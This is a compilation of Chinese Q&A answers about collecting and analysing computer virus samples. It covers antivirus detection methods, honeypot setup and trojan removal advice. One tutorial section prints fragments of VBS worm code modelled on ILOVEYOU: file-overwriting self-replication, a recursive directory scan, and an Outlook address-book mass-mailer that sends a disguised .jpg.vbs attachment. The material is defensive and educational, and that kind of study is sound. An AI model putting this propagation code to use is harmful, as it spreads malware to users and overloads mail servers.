中了photo木马病毒,但是用360专门查杀却说没发现病毒样本,为什么?
是卡巴阻止的,我以前做过实验,自己编一行恶意代码,然后保存,运行。好的杀毒软件在保存时就直接杀了,差的要等到运行才杀,卡巴是所有软件中最快对病毒作出反应的。
[250分的问题]关于病毒样本和病毒分析和病毒分析工具、方法
1病毒样本要从哪里来
就病毒代码的存在形式来说,有两种,一种是病毒自身是个独立的程序文件,另一种是它附着在正常的程序文件上,即所谓的感染,所以,病毒样本其实就是指怀疑为病毒或染毒的文件
不过实际上,病毒程序并不一定象你说的那样清清楚楚的有个主程序,现在的病毒木马,都是几个程序文件组成,相互保护、相互调用运行,它们都是病毒样本
病毒的发作状态,有些是能察觉出来的,比如:增加了进程、电脑速度或网速变慢、系统运行报错等等,有些病毒发作时,几乎没有外在表现,很隐蔽
病毒其实就是一段程序,一是一,二是二,一点也不可怕和神秘,只要不运行它,它就是死的,非常安全,如果你怕在提取过程中误运行了病毒,可以把病毒程序文件的扩展名改一下,改为不可被执行或被直接打开的扩展名即可,或根本就不要扩展名,这样在拷贝、传输过程中就非常安全了
2要怎么分析
(1)http://www.qiker.com/jiaocheng/heibai6/%B2%A1%B6%BE%D0%C5%CF%A2/vir00041.htm(病毒分析祥解)
(2)一、Vbs脚本病毒的特点及发展现状
VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:
1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。
5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
二、Vbs脚本病毒原理分析
1.vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录;递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
2.vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:
1)通过Email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间
Set addrList= mapiObj.AddressLists //获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count 0 Then
addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题
item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To "" Then
item.Send //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记,以免重复感染
End If
Next
End If
Next
End if
End Function
太多了~你能不能自己去看?百度发不来~还有250分
http://topic.csdn.net/t/20040717/09/3183195.html
请问哪里可以下载到木马样本?需要量比较大的,谢谢你了!
样本很多杀软的网站要求注册后会提供 你试试趋势科技的 我以前去时有病毒样本的下载 不过要先注册(免费的)
电脑中木马了病毒了。我保留了病毒样本。谁能帮我看看?
您好!电脑中毒可以安装杀毒软件进行升级杀毒操作;
如果存在劫持类病毒导致杀毒软件不能正常打开或安装,可下载一些去掉劫持的工具或软件,如“瑞星安全助手”等进行处理后在升级杀毒;
如果依然不能解决问题,建议联系瑞星工程师寻求帮助,电话:4006608866。
电脑中了一种自称为鬼魅病毒的木马,有样本。
朋友,你好,鬼魅木马是最新型的变种木马,非常的巩固,一般的杀毒软件在系统下很难杀死它,而且传播速度非常快,一般都是全盘中这个木马,所以你首先开机,按下F8键,进入安全模式,找开QQ管家,杀毒前将病毒库升级为最新版本,在安全模式用QQ管家全盘杀毒,因为在安全模式下,只启动最少程序,这样很少激活病毒,所以在安全模式下能最有效的杀死病毒,如果这样做了还杀不死,哪只有最后一种方法:哪就是你用 U盘保存好资料,然后到电脑店或者软件店买一张带PE的GHOST版的XP或者WIN7光盘(一般5-8元一张).,设好光驱启动,然后进到光盘中,打开PE,在PE下面全盘格式化,然后在PE下面重装系统,因为在PE下面不能激法病毒,而格式化可以将所有的病毒格式掉,不管是什么巩固性的木马和病毒,都可以搞定,然后再重装系统,就没有病毒了,一切大功告成。
希望我的回答对你有所帮助,祝你成功,快乐~~
木马和病毒会在支付宝里出现么?
估计你被盗的是登录密码吧,或者仅仅是收到了恶意的攻击。在支付环节,有一系列的安全措施,像身份验证、手机绑定、密码设置,都是为了防止被盗号或者丢失。你说的和我前段时间的情况一样,qq邮箱发来消息,说支付宝异地登陆,要更改密码、风险提示什么的。后来,确定被盗号了,又是找回又是改密码,忙了老半天。 一般木马和病毒是最常见的电脑安全漏洞的攻击者,像曾经风靡一时的熊猫烧香,就是一个例子。专门用于支付宝盗号的木马,下面就介绍一主要的吧。病毒名称:Trojan/Win32.Banker.ue[Banker]病毒类型: 网银木马感染系统: Windows98以上版本危害等级: 4。病毒描述:该病毒是一个窃取支付宝和银行账号的木马,EXE病毒文件为易语言所写,病毒运行之后衍生Shells.dll文件到系统目录下,创建2个隐藏CMD.EXE进程,删除队列消息。遍历进程查找CMD.EXE进程,将衍生的Shells.dll病毒文件注入到CMD进程中,注入成功后弹出一个“文件已损坏!”的信息框误导用户以为文件损坏而不怀疑病毒文件,将病毒DLL注入之后调用远程线程执行病毒代码。 将自己的电脑时刻保护好,才最安全,我用的是电脑管家的查杀,很有效果。
计算机病毒分离出的样本有利用价值吗???
你好,计算机病毒的检测最简单的方法是用较新的防病毒软件对磁盘进行全面的检测。如何及早的发现新病毒首先
计算机病毒的检测
最简单的方法是用较新的防病毒软件对磁盘进行全面的检测。
如何及早的发现新病毒
首先应注意内存情况,绝大部分的病毒是驻留内存的。
其次应注意常用的可执行文件的字节数。大多数病毒在对文件进行传染后会使文件的长度增加。
对于软盘,则应注意是否无故出现坏块(有些病毒会在盘上做坏蔟标记,以便将其自身部分隐藏其中)。
检测病毒的方法-特征代码法
实现步骤:采集已知的病毒样本,从中抽取病毒代码
依据原则:
抽取的代码比较特殊,不大可能与普通正常程序代码吻合。
抽取的代码要有适当的长度,一方面维持特征代码的唯一性,另一方面不要有太大的空间与时间开销。
将特征代码纳入病毒数据库。
检测过程:打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现,由于特征代码与病毒一一对应,便可以断定,被查文件中含有何种病毒。
优点:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理
缺点:不能检测未知病毒,需要搜集已知病毒的特征代码,费用开销大、在网络上效率低。
病毒检测工具SCAN、CPAV
检测病毒的方法-校验和法
计算正常文件内容的校验和,将该校验和写入文件中或别的文件中保存,在文件使用过程中,定期地或每次使用文件前,检查文件现在内容算出的校验和与原来是否一致,因而可以发现文件是否感染,这种方法叫校验和法。
运用校验和法查病毒采用3种方式:
在病毒检测工具中纳入校验和法
在应用程序中放入校验和法自我检查功能
将校验和检查程序常驻内存
优点:能发现未知病毒
缺点:不能识别病毒名称,会误报警、不能对付隐蔽型病毒(隐蔽型病毒进驻内存后,会自动剥去染毒程序中的病毒代码,使校验和法受骗,对一个有毒文件算出正常校验和)
检测病毒的方法-行为监测法
行为监测法:利用病毒的特有行为特征性来监测病毒的方法。
通过对病毒多年的观察、研究,有一些行为是病毒的共同行为,而且比较特殊。在正常程序中,这些行为比较罕见。当程序运行时,监视其行为,如果发现了病毒行为,立即报警。
行为监测法的优点:可发现未知病毒、可相当准确地预报未知的多数病毒。
行为监测法的缺点:可能误报警、不能识别病毒名称、实现时有一定难度。
检测病毒的方法-软件模拟法
多态性病毒每次感染都变化其病毒密码,对付这种病毒,特征代码法失效。因为多态性病毒代码实施密码化,而且每次所用密钥不同,把染毒的病毒代码相互比较也各不相同,因此,出现了一种新的病毒监测方法,那就是软件模拟法。该类工具开始使用特征代码法监测病毒,如果发现隐蔽病毒或多态性病毒嫌疑时,启动软件模拟模块,监测病毒的运行,待病毒自身的密码译码后,再运用特征代码法来识别病毒的种类。
检测病毒的方法(小结)
特征代码法
采集病毒样本,抽取特征代码
特点:能快速、准确检验已知病毒,不能发现未知的病毒。
校验和法: 根据文件内容计算的校验和与以前的作比较。
优点:能判断文件细微变化,发现未知病毒。
缺点:当软件升级、改口令时会产生误报;不能识别病毒名称;对隐蔽性病毒无效。
行为监测法: 基于对病毒特有行为的判断
特点:发现许多未知病毒;可能误报,实施难
软件模拟法:一种软件分析器,用软件方法来模拟和分析程序的运行。
特点:可用于对付多态病毒。
研究病毒技术是为了更好的做好反病毒工作。我们反对一切形式的破坏,我们要致力于反病毒事业。
在这里我会简单的先容病毒样本的获取与分析方法。
个人如何获取病毒样本呢?
对于我们个人用户来说,当然没有反病毒公司截获病毒的那种条件。不过,要找一些病毒样本来分析也不是一件难事情。
我们可以设置自己的蜜罐。
首先要预备一个虚拟机,在虚拟机里面安装win2k+sp1,再安装iis6.0和sql server 2000,能打开的服务都打开,最好再安装nav(防止重复获得已知的病毒样本),并安装isa防火墙来监控网络流,在用sniffer xp来做地层包的截获,最后安装文件变化记录器(主要用于crc32校验比较以判定文件是否发生变化,我们仅监视几种病毒经常感染的文件类型就可以了)。在用虚拟机的快照功能备份虚拟机中的系统。
这样我们就预备好了自己的diy型蜜罐,现在到hotmail注册一个e-mail,然后加进多个国外的新闻组等热闹的地方,这样就会有更多的机会得当样本。接下来就是等待了,经常查看信箱的邮件,等到sniffer xp监视出现流量异常或nav被封闭或失效,此时应该多打开几次一些program files目录下的程序以保证病毒的感染,一般来说ipc$和iis进来的病毒或者懦虫会开一些新的进程,我们可以用ctrl+alt+del把他们查出来,知道那些文件--复制到保存样本的介质上~~然后把文件变化器中发现的文件拷贝出来,这样就得到疑似样本了。
vbs脚本病毒样本的提取
当获得了vbs脚本病毒样本后,其提取方法是比较简单的。对于获取的vbs脚本病毒样本,我们可以直接用文本编辑器打开样本文件查看其中的原代码。对于有加密的病毒,样本提取的工作实在到这里就已经结束了。
一次性加/解密的病毒样本
这样的病毒比较普遍,但是弱点也比较明显。由于他们是对加密病毒代码一次性解密后直接运行的,我们便可以在其解密之后、执行之前将病毒代码提取出来,或者干脆删除其代码,写进我们自己的病毒提取代码。
这里我以大家比较熟悉的“新欢乐时光”为例子,说明这种方法提出的方法。
感染这个病毒后,会发现在每个目录下都有两个隐躲文件: desktop.ini folder.htt
用ultraedit打开 folder.htt ,会发现这个文件总共才93行,第一行为body ,几行注释后,以html开始,/html结束,很显然这是一个htm格式的文件(folder.htt摸板就是采用了样式表和html标记).
可通过分布式蜜罐、诱饵信箱、邮件服务代管、VDS监控探头、用户主动上报、样本志愿者上报等方式在第一时间内捕获病毒样本,从而形成了一个庞大的监控预警体系。目前,安天每天都要处理数万次不重复文件上报事件,其流行病毒样本与国际主流反病毒企业同步更新。所有有原厂发布站点的各种后门(Backdoor)、木马(Trojan)等,保证在新版本发布的24小时内得到样本;流行蠕虫在2至24小时内得到样本,捕获后两小时内即可完成全部分析工作,并提交到用户升级特征库中。 可疑文件上报
欢迎来电脑管家企业平台提问